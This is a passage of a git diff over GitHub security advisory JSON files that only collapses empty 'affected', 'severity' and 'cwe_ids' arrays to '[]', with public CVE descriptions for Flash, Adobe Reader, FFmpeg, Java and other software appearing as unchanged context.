"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2r2m-q8h6-56hw/GHSA-2r2m-q8h6-56hw.json b/advisories/unreviewed/2022/05/GHSA-2r2m-q8h6-56hw/GHSA-2r2m-q8h6-56hw.json index 5d4d17314ad..0208c4eb96c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r2m-q8h6-56hw/GHSA-2r2m-q8h6-56hw.json +++ b/advisories/unreviewed/2022/05/GHSA-2r2m-q8h6-56hw/GHSA-2r2m-q8h6-56hw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2r65-4p7m-p4r7/GHSA-2r65-4p7m-p4r7.json b/advisories/unreviewed/2022/05/GHSA-2r65-4p7m-p4r7/GHSA-2r65-4p7m-p4r7.json index cce6435aacb..2653117d2e8 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r65-4p7m-p4r7/GHSA-2r65-4p7m-p4r7.json +++ b/advisories/unreviewed/2022/05/GHSA-2r65-4p7m-p4r7/GHSA-2r65-4p7m-p4r7.json @@ -7,12 +7,8 @@ "CVE-2012-2787" ], "details": "Unspecified vulnerability in the decode_frame function in libavcodec/indeo4.c in FFmpeg before 0.11 and Libav 0.8.x before 0.8.4 has unknown impact and attack vectors, related to the \"setup width/height.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2rjf-47pg-4v46/GHSA-2rjf-47pg-4v46.json b/advisories/unreviewed/2022/05/GHSA-2rjf-47pg-4v46/GHSA-2rjf-47pg-4v46.json index 3ec7405f416..56cb726ad33 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rjf-47pg-4v46/GHSA-2rjf-47pg-4v46.json +++ b/advisories/unreviewed/2022/05/GHSA-2rjf-47pg-4v46/GHSA-2rjf-47pg-4v46.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2rp8-9wwh-qcx6/GHSA-2rp8-9wwh-qcx6.json b/advisories/unreviewed/2022/05/GHSA-2rp8-9wwh-qcx6/GHSA-2rp8-9wwh-qcx6.json index 3217ef0c7f7..e8ecf869dc3 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rp8-9wwh-qcx6/GHSA-2rp8-9wwh-qcx6.json +++ b/advisories/unreviewed/2022/05/GHSA-2rp8-9wwh-qcx6/GHSA-2rp8-9wwh-qcx6.json @@ -7,12 +7,8 @@ "CVE-2011-0558" ], "details": "Integer overflow in Adobe Flash Player before 10.2.152.26 allows attackers to execute arbitrary code via a large array length value in the ActionScript method of the Function class.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -104,9 +100,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2xwj-rw2w-xr5q/GHSA-2xwj-rw2w-xr5q.json b/advisories/unreviewed/2022/05/GHSA-2xwj-rw2w-xr5q/GHSA-2xwj-rw2w-xr5q.json index 9c6622fbaf7..20a72ea5588 100644 --- a/advisories/unreviewed/2022/05/GHSA-2xwj-rw2w-xr5q/GHSA-2xwj-rw2w-xr5q.json +++ b/advisories/unreviewed/2022/05/GHSA-2xwj-rw2w-xr5q/GHSA-2xwj-rw2w-xr5q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-322r-xwx7-m2r9/GHSA-322r-xwx7-m2r9.json b/advisories/unreviewed/2022/05/GHSA-322r-xwx7-m2r9/GHSA-322r-xwx7-m2r9.json index fdd618920fd..aed689b0acd 100644 --- a/advisories/unreviewed/2022/05/GHSA-322r-xwx7-m2r9/GHSA-322r-xwx7-m2r9.json +++ b/advisories/unreviewed/2022/05/GHSA-322r-xwx7-m2r9/GHSA-322r-xwx7-m2r9.json @@ -7,12 +7,8 @@ "CVE-2011-0578" ], "details": "Adobe Flash Player before 10.2.152.26 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors related to a constructor for an unspecified ActionScript3 object and improper type checking, a different vulnerability than CVE-2011-0559, CVE-2011-0560, CVE-2011-0561, CVE-2011-0571, CVE-2011-0572, CVE-2011-0573, CVE-2011-0574, CVE-2011-0607, and CVE-2011-0608.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-32xh-h6c6-4hvr/GHSA-32xh-h6c6-4hvr.json b/advisories/unreviewed/2022/05/GHSA-32xh-h6c6-4hvr/GHSA-32xh-h6c6-4hvr.json index d182f7c8d17..03d38e261a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-32xh-h6c6-4hvr/GHSA-32xh-h6c6-4hvr.json +++ b/advisories/unreviewed/2022/05/GHSA-32xh-h6c6-4hvr/GHSA-32xh-h6c6-4hvr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-33jv-mx9r-jr3q/GHSA-33jv-mx9r-jr3q.json b/advisories/unreviewed/2022/05/GHSA-33jv-mx9r-jr3q/GHSA-33jv-mx9r-jr3q.json index 2bb08ce4a48..20bc50653fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-33jv-mx9r-jr3q/GHSA-33jv-mx9r-jr3q.json +++ b/advisories/unreviewed/2022/05/GHSA-33jv-mx9r-jr3q/GHSA-33jv-mx9r-jr3q.json @@ -7,12 +7,8 @@ "CVE-2010-2165" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-33q7-w2pp-4v3v/GHSA-33q7-w2pp-4v3v.json b/advisories/unreviewed/2022/05/GHSA-33q7-w2pp-4v3v/GHSA-33q7-w2pp-4v3v.json index 0821fcb392d..8445912f733 100644 --- a/advisories/unreviewed/2022/05/GHSA-33q7-w2pp-4v3v/GHSA-33q7-w2pp-4v3v.json +++ b/advisories/unreviewed/2022/05/GHSA-33q7-w2pp-4v3v/GHSA-33q7-w2pp-4v3v.json @@ -7,12 +7,8 @@ "CVE-2012-2786" ], "details": "Unspecified vulnerability in the decode_wdlt function in libavcodec/dfa.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an \"out of array write.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3426-h5fc-ghj2/GHSA-3426-h5fc-ghj2.json b/advisories/unreviewed/2022/05/GHSA-3426-h5fc-ghj2/GHSA-3426-h5fc-ghj2.json index 85796f182d9..1daba3d6fee 100644 --- a/advisories/unreviewed/2022/05/GHSA-3426-h5fc-ghj2/GHSA-3426-h5fc-ghj2.json +++ b/advisories/unreviewed/2022/05/GHSA-3426-h5fc-ghj2/GHSA-3426-h5fc-ghj2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-345c-xx24-53p2/GHSA-345c-xx24-53p2.json b/advisories/unreviewed/2022/05/GHSA-345c-xx24-53p2/GHSA-345c-xx24-53p2.json index 4cb78de79e3..37ae5302e51 100644 --- a/advisories/unreviewed/2022/05/GHSA-345c-xx24-53p2/GHSA-345c-xx24-53p2.json +++ b/advisories/unreviewed/2022/05/GHSA-345c-xx24-53p2/GHSA-345c-xx24-53p2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3543-r684-9c6x/GHSA-3543-r684-9c6x.json b/advisories/unreviewed/2022/05/GHSA-3543-r684-9c6x/GHSA-3543-r684-9c6x.json index c9f0da2385f..e5b875e4cb8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3543-r684-9c6x/GHSA-3543-r684-9c6x.json +++ b/advisories/unreviewed/2022/05/GHSA-3543-r684-9c6x/GHSA-3543-r684-9c6x.json @@ -7,12 +7,8 @@ "CVE-2008-4814" ], "details": "Unspecified vulnerability in a JavaScript method in Adobe Reader and Acrobat 8.1.2 and earlier, and before 7.1.1, allows remote attackers to execute arbitrary code via unknown vectors, related to an \"input validation issue.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3572-6mff-q3jr/GHSA-3572-6mff-q3jr.json b/advisories/unreviewed/2022/05/GHSA-3572-6mff-q3jr/GHSA-3572-6mff-q3jr.json index 037c109920f..c83da829484 100644 --- a/advisories/unreviewed/2022/05/GHSA-3572-6mff-q3jr/GHSA-3572-6mff-q3jr.json +++ b/advisories/unreviewed/2022/05/GHSA-3572-6mff-q3jr/GHSA-3572-6mff-q3jr.json @@ -7,12 +7,8 @@ "CVE-2011-0802" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Sound, a different vulnerability than CVE-2011-0814.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -136,9 +132,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-357w-9qpx-whwh/GHSA-357w-9qpx-whwh.json b/advisories/unreviewed/2022/05/GHSA-357w-9qpx-whwh/GHSA-357w-9qpx-whwh.json index 352b1a465a8..12aaf703199 100644 --- a/advisories/unreviewed/2022/05/GHSA-357w-9qpx-whwh/GHSA-357w-9qpx-whwh.json +++ b/advisories/unreviewed/2022/05/GHSA-357w-9qpx-whwh/GHSA-357w-9qpx-whwh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3663-jc33-8vjp/GHSA-3663-jc33-8vjp.json b/advisories/unreviewed/2022/05/GHSA-3663-jc33-8vjp/GHSA-3663-jc33-8vjp.json index db8b5c52589..ff6c6f39a07 100644 --- a/advisories/unreviewed/2022/05/GHSA-3663-jc33-8vjp/GHSA-3663-jc33-8vjp.json +++ b/advisories/unreviewed/2022/05/GHSA-3663-jc33-8vjp/GHSA-3663-jc33-8vjp.json @@ -7,12 +7,8 @@ "CVE-2008-4837" ], "details": "Stack-based buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, 2003 SP3, and 2007 Gold and SP1; Word Viewer 2003 Gold and SP3; Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Gold and SP1; and Microsoft Works 8 allow remote attackers to execute arbitrary code via a crafted Word document that contains a malformed table property, which triggers memory corruption, aka \"Word Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-366g-r7wg-rvmp/GHSA-366g-r7wg-rvmp.json b/advisories/unreviewed/2022/05/GHSA-366g-r7wg-rvmp/GHSA-366g-r7wg-rvmp.json index e75ea72a6ab..a38661bf0a9 100644 --- a/advisories/unreviewed/2022/05/GHSA-366g-r7wg-rvmp/GHSA-366g-r7wg-rvmp.json +++ b/advisories/unreviewed/2022/05/GHSA-366g-r7wg-rvmp/GHSA-366g-r7wg-rvmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-366v-v593-vgfm/GHSA-366v-v593-vgfm.json b/advisories/unreviewed/2022/05/GHSA-366v-v593-vgfm/GHSA-366v-v593-vgfm.json index 0f489ee87cd..7b67cd0d9ba 100644 --- a/advisories/unreviewed/2022/05/GHSA-366v-v593-vgfm/GHSA-366v-v593-vgfm.json +++ b/advisories/unreviewed/2022/05/GHSA-366v-v593-vgfm/GHSA-366v-v593-vgfm.json @@ -7,12 +7,8 @@ "CVE-2010-2163" ], "details": "Multiple unspecified vulnerabilities in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3734-5vqh-gp62/GHSA-3734-5vqh-gp62.json b/advisories/unreviewed/2022/05/GHSA-3734-5vqh-gp62/GHSA-3734-5vqh-gp62.json index aaa7e1fd6e8..03b9bb94825 100644 --- a/advisories/unreviewed/2022/05/GHSA-3734-5vqh-gp62/GHSA-3734-5vqh-gp62.json +++ b/advisories/unreviewed/2022/05/GHSA-3734-5vqh-gp62/GHSA-3734-5vqh-gp62.json @@ -7,12 +7,8 @@ "CVE-2008-5009" ], "details": "Race condition in the s_xout kernel module in Sun Solstice X.25 9.2, when running on a multiple CPU machine, allows local users to cause a denial of service (panic) via vectors involving reading the /dev/xty file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-386p-9c5m-h95w/GHSA-386p-9c5m-h95w.json b/advisories/unreviewed/2022/05/GHSA-386p-9c5m-h95w/GHSA-386p-9c5m-h95w.json index a6a1069d449..895d823c33e 100644 --- a/advisories/unreviewed/2022/05/GHSA-386p-9c5m-h95w/GHSA-386p-9c5m-h95w.json +++ b/advisories/unreviewed/2022/05/GHSA-386p-9c5m-h95w/GHSA-386p-9c5m-h95w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-38pv-q5j7-w3w9/GHSA-38pv-q5j7-w3w9.json b/advisories/unreviewed/2022/05/GHSA-38pv-q5j7-w3w9/GHSA-38pv-q5j7-w3w9.json index f37d6f02594..7b837578ef2 100644 --- a/advisories/unreviewed/2022/05/GHSA-38pv-q5j7-w3w9/GHSA-38pv-q5j7-w3w9.json +++ b/advisories/unreviewed/2022/05/GHSA-38pv-q5j7-w3w9/GHSA-38pv-q5j7-w3w9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-394g-p2rq-jhvm/GHSA-394g-p2rq-jhvm.json b/advisories/unreviewed/2022/05/GHSA-394g-p2rq-jhvm/GHSA-394g-p2rq-jhvm.json index 38745b87ede..514c44d5e89 100644 --- a/advisories/unreviewed/2022/05/GHSA-394g-p2rq-jhvm/GHSA-394g-p2rq-jhvm.json +++ b/advisories/unreviewed/2022/05/GHSA-394g-p2rq-jhvm/GHSA-394g-p2rq-jhvm.json @@ -7,12 +7,8 @@ "CVE-2015-0252" ], "details": "internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3997-cwm3-9wpp/GHSA-3997-cwm3-9wpp.json b/advisories/unreviewed/2022/05/GHSA-3997-cwm3-9wpp/GHSA-3997-cwm3-9wpp.json index e29f792ddb8..dd45f33c0c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-3997-cwm3-9wpp/GHSA-3997-cwm3-9wpp.json +++ b/advisories/unreviewed/2022/05/GHSA-3997-cwm3-9wpp/GHSA-3997-cwm3-9wpp.json @@ -7,12 +7,8 @@ "CVE-2011-0594" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a font.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-39c8-3fh7-57wr/GHSA-39c8-3fh7-57wr.json b/advisories/unreviewed/2022/05/GHSA-39c8-3fh7-57wr/GHSA-39c8-3fh7-57wr.json index 558b6eb8580..afff258930a 100644 --- a/advisories/unreviewed/2022/05/GHSA-39c8-3fh7-57wr/GHSA-39c8-3fh7-57wr.json +++ b/advisories/unreviewed/2022/05/GHSA-39c8-3fh7-57wr/GHSA-39c8-3fh7-57wr.json @@ -7,12 +7,8 @@ "CVE-2011-0600" ], "details": "The U3D component in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file with an invalid Parent Node count that triggers an incorrect size calculation and memory corruption, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0595.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3c6p-4f52-2c76/GHSA-3c6p-4f52-2c76.json b/advisories/unreviewed/2022/05/GHSA-3c6p-4f52-2c76/GHSA-3c6p-4f52-2c76.json index 6cc64eb0ff8..ce6f24aab6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-3c6p-4f52-2c76/GHSA-3c6p-4f52-2c76.json +++ b/advisories/unreviewed/2022/05/GHSA-3c6p-4f52-2c76/GHSA-3c6p-4f52-2c76.json @@ -7,12 +7,8 @@ "CVE-2011-0566" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3fhh-g5rg-6jpm/GHSA-3fhh-g5rg-6jpm.json b/advisories/unreviewed/2022/05/GHSA-3fhh-g5rg-6jpm/GHSA-3fhh-g5rg-6jpm.json index ef070c4c846..e4045557e87 100644 --- a/advisories/unreviewed/2022/05/GHSA-3fhh-g5rg-6jpm/GHSA-3fhh-g5rg-6jpm.json +++ b/advisories/unreviewed/2022/05/GHSA-3fhh-g5rg-6jpm/GHSA-3fhh-g5rg-6jpm.json @@ -7,12 +7,8 @@ "CVE-2011-0633" ], "details": "The Net::HTTPS module in libwww-perl (LWP) before 6.00, as used in WWW::Mechanize, LWP::UserAgent, and other products, when running in environments that do not set the If-SSL-Cert-Subject header, does not enable full validation of SSL certificates by default, which allows remote attackers to spoof servers via man-in-the-middle (MITM) attacks involving hostnames that are not properly validated. NOTE: it could be argued that this is a design limitation of the Net::HTTPS API, and separate implementations should be independently assigned CVE identifiers for not working around this limitation. However, because this API was modified within LWP, a single CVE identifier has been assigned.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3g82-r8f2-r5vq/GHSA-3g82-r8f2-r5vq.json b/advisories/unreviewed/2022/05/GHSA-3g82-r8f2-r5vq/GHSA-3g82-r8f2-r5vq.json index 391e9433467..e76124c14ab 100644 --- a/advisories/unreviewed/2022/05/GHSA-3g82-r8f2-r5vq/GHSA-3g82-r8f2-r5vq.json +++ b/advisories/unreviewed/2022/05/GHSA-3g82-r8f2-r5vq/GHSA-3g82-r8f2-r5vq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3mg9-cvj8-qmx7/GHSA-3mg9-cvj8-qmx7.json b/advisories/unreviewed/2022/05/GHSA-3mg9-cvj8-qmx7/GHSA-3mg9-cvj8-qmx7.json index f82909c4f75..ed81c53e418 100644 --- a/advisories/unreviewed/2022/05/GHSA-3mg9-cvj8-qmx7/GHSA-3mg9-cvj8-qmx7.json +++ b/advisories/unreviewed/2022/05/GHSA-3mg9-cvj8-qmx7/GHSA-3mg9-cvj8-qmx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3p9g-q4q3-x6mr/GHSA-3p9g-q4q3-x6mr.json b/advisories/unreviewed/2022/05/GHSA-3p9g-q4q3-x6mr/GHSA-3p9g-q4q3-x6mr.json index 6b949461b57..53d487a0b70 100644 --- a/advisories/unreviewed/2022/05/GHSA-3p9g-q4q3-x6mr/GHSA-3p9g-q4q3-x6mr.json +++ b/advisories/unreviewed/2022/05/GHSA-3p9g-q4q3-x6mr/GHSA-3p9g-q4q3-x6mr.json @@ -7,12 +7,8 @@ "CVE-2008-5205" ], "details": "Cross-site scripting (XSS) vulnerability in edit.php in wellyblog allows remote attackers to inject arbitrary web script or HTML via the articleid parameter in an add action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3pm4-hp5q-g8qj/GHSA-3pm4-hp5q-g8qj.json b/advisories/unreviewed/2022/05/GHSA-3pm4-hp5q-g8qj/GHSA-3pm4-hp5q-g8qj.json index cfdbe7fd0b7..650685c1742 100644 --- a/advisories/unreviewed/2022/05/GHSA-3pm4-hp5q-g8qj/GHSA-3pm4-hp5q-g8qj.json +++ b/advisories/unreviewed/2022/05/GHSA-3pm4-hp5q-g8qj/GHSA-3pm4-hp5q-g8qj.json @@ -7,12 +7,8 @@ "CVE-2012-2104" ], "details": "cgi-bin/munin-cgi-graph in Munin 2.x writes data to a log file without sanitizing non-printable characters, which might allow user-assisted remote attackers to inject terminal emulator escape sequences and execute arbitrary commands or delete arbitrary files via a crafted HTTP request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3qcw-5j3f-5872/GHSA-3qcw-5j3f-5872.json b/advisories/unreviewed/2022/05/GHSA-3qcw-5j3f-5872/GHSA-3qcw-5j3f-5872.json index 3ba5cd2d403..a848b0e2f03 100644 --- a/advisories/unreviewed/2022/05/GHSA-3qcw-5j3f-5872/GHSA-3qcw-5j3f-5872.json +++ b/advisories/unreviewed/2022/05/GHSA-3qcw-5j3f-5872/GHSA-3qcw-5j3f-5872.json @@ -7,12 +7,8 @@ "CVE-2010-2164" ], "details": "Use-after-free vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors related to an unspecified \"image type within a certain function.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -136,9 +132,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3qm9-52c7-2c7g/GHSA-3qm9-52c7-2c7g.json b/advisories/unreviewed/2022/05/GHSA-3qm9-52c7-2c7g/GHSA-3qm9-52c7-2c7g.json index fdfa3897c27..e18bdc9e4f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-3qm9-52c7-2c7g/GHSA-3qm9-52c7-2c7g.json +++ b/advisories/unreviewed/2022/05/GHSA-3qm9-52c7-2c7g/GHSA-3qm9-52c7-2c7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3r77-48qc-c242/GHSA-3r77-48qc-c242.json b/advisories/unreviewed/2022/05/GHSA-3r77-48qc-c242/GHSA-3r77-48qc-c242.json index c7593d0e73a..5726add5915 100644 --- a/advisories/unreviewed/2022/05/GHSA-3r77-48qc-c242/GHSA-3r77-48qc-c242.json +++ b/advisories/unreviewed/2022/05/GHSA-3r77-48qc-c242/GHSA-3r77-48qc-c242.json @@ -7,12 +7,8 @@ "CVE-2010-3657" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3rgf-xqhg-x97j/GHSA-3rgf-xqhg-x97j.json b/advisories/unreviewed/2022/05/GHSA-3rgf-xqhg-x97j/GHSA-3rgf-xqhg-x97j.json index 508c2cb0f4c..b2f52e475db 100644 --- a/advisories/unreviewed/2022/05/GHSA-3rgf-xqhg-x97j/GHSA-3rgf-xqhg-x97j.json +++ b/advisories/unreviewed/2022/05/GHSA-3rgf-xqhg-x97j/GHSA-3rgf-xqhg-x97j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3vj4-cvjp-482h/GHSA-3vj4-cvjp-482h.json b/advisories/unreviewed/2022/05/GHSA-3vj4-cvjp-482h/GHSA-3vj4-cvjp-482h.json index 6e078da55dd..bdec0b173d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-3vj4-cvjp-482h/GHSA-3vj4-cvjp-482h.json +++ b/advisories/unreviewed/2022/05/GHSA-3vj4-cvjp-482h/GHSA-3vj4-cvjp-482h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-3w5h-vwcq-cggw/GHSA-3w5h-vwcq-cggw.json b/advisories/unreviewed/2022/05/GHSA-3w5h-vwcq-cggw/GHSA-3w5h-vwcq-cggw.json index 65fa681345f..b1e27228877 100644 --- a/advisories/unreviewed/2022/05/GHSA-3w5h-vwcq-cggw/GHSA-3w5h-vwcq-cggw.json +++ 